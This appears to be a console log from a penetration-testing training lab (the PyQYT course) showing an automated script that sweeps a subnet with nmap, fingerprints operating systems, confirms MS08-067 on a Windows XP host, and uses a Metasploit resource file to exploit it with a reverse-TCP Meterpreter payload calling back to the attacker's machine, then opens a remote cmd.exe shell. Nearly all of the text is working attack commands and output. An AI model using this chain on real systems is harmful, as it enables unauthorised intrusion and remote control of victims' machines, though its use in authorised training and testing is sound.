root@kali:~/PyQYT/Practice_Lab#
./Hacker_Auto.py 202.100.1.0/24
=============================================================================
第一步:开始NMAP网络Ping扫描以发现活动主机
发现网络中的活动主机:
202.100.1.101
is UP
202.100.1.200
is UP
202.100.1.201
is UP
============================================================================
第二步:判断活动主机的操作系统
活动主机操作系统判断结果:
202.100.1.101 操作系统为: ['Linux
3.8 - 3.19']
202.100.1.200 操作系统为:
['Microsoft Windows 2000 SP0 - SP4', 'Windows XP SP0 -
SP1']
202.100.1.201 操作系统为:
['Microsoft Windows 7 SP0 - SP1', 'Windows Server 2008 SP1',
'Windows 8', 'Windows 8.1 Update 1']
=============================================================================
第三步:开始对可疑系统(Windows)进行针对性的MS08_067确认
被怀疑存在MS08_067漏洞的主机如下:
202.100.1.200
被怀疑可能存在MS08_067漏洞,并且开始进行确认
202.100.1.200
被确认存在MS08_067漏洞!!!
202.100.1.201
被怀疑可能存在MS08_067漏洞,并且开始进行确认
202.100.1.201
被确认不存在MS08_067漏洞
================================================================================
第四步:开始使用Metasploit对存在MS08_067漏洞的主机发起攻击
开始发起对主机202.100.1.200的攻击!
=[
metasploit v4.11.5-2016010401 ]
+ -- --=[ 1517 exploits - 875
auxiliary - 257 post ]
+ -- --=[ 437 payloads - 37
encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro
trial: http://r-7.co/trymsp ]
[*] Processing qytang.rc for
ERB directives.
resource (qytang.rc)> use
exploit/multi/handler
resource (qytang.rc)> set
PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD =>
windows/meterpreter/reverse_tcp
resource (qytang.rc)> set
LPORT 5092
LPORT => 5092
resource (qytang.rc)> set
LHOST 202.100.1.101
LHOST =>
202.100.1.101
resource (qytang.rc)>
exploit -j -z
[*] Exploit running as
background job.
resource (qytang.rc)> setg
DisablePayLoadHandler 1
DisablePayLoadHandler =>
1
resource (qytang.rc)> use
exploit/windows/smb/ms08_067_netapi
resource (qytang.rc)> set
RHOST 202.100.1.200
RHOST =>
202.100.1.200
resource (qytang.rc)> set
payload windows/meterpreter/reverse_tcp
[*] Started reverse TCP handler
on 202.100.1.101:5092
payload =>
windows/meterpreter/reverse_tcp
[*] Starting the payload
handler...
resource (qytang.rc)> set
LPORT 5092
LPORT => 5092
resource (qytang.rc)> set
LHOST 202.100.1.101
LHOST =>
202.100.1.101
resource (qytang.rc)>
exploit -j -z
[*] Exploit running as
background job.
resource (qytang.rc)> sleep
10
[*] Automatically detecting the
target...
[*] Fingerprint: Windows XP -
Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP
SP0/SP1 Universal
[*] Attempting to trigger the
vulnerability...
[*] Sending stage (957487
bytes) to 202.100.1.200
[*] Meterpreter session 1
opened (202.100.1.101:5092 -> 202.100.1.200:1032) at 2016-05-20
18:04:41 +0800
resource (qytang.rc)>
sessions -i 1
[*] Starting interaction with
1...
meterpreter > execute -i -f
cmd.exe
Process 1680
created.
Channel 1 created.
Microsoft Windows XP [Version
5.1.2600]
(C) Copyright 1985-2001
Microsoft Corp.
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP
Configuration
Ethernet adapter Local Area
Connection 2:
Connection-specific DNS Suffix .
:
IP
Address. . . . . . . . . . . . : 202.100.1.200
Subnet
Mask . . . . . . . . . . . : 255.255.255.0
Default
Gateway . . . . . . . . . : 202.100.1.10
C:\WINDOWS\system32>
更多学习资料和题库,请访问乾颐堂官网:
欢迎来我的开源项目PyQYT:
https://github.com/collinsctk/PyQYT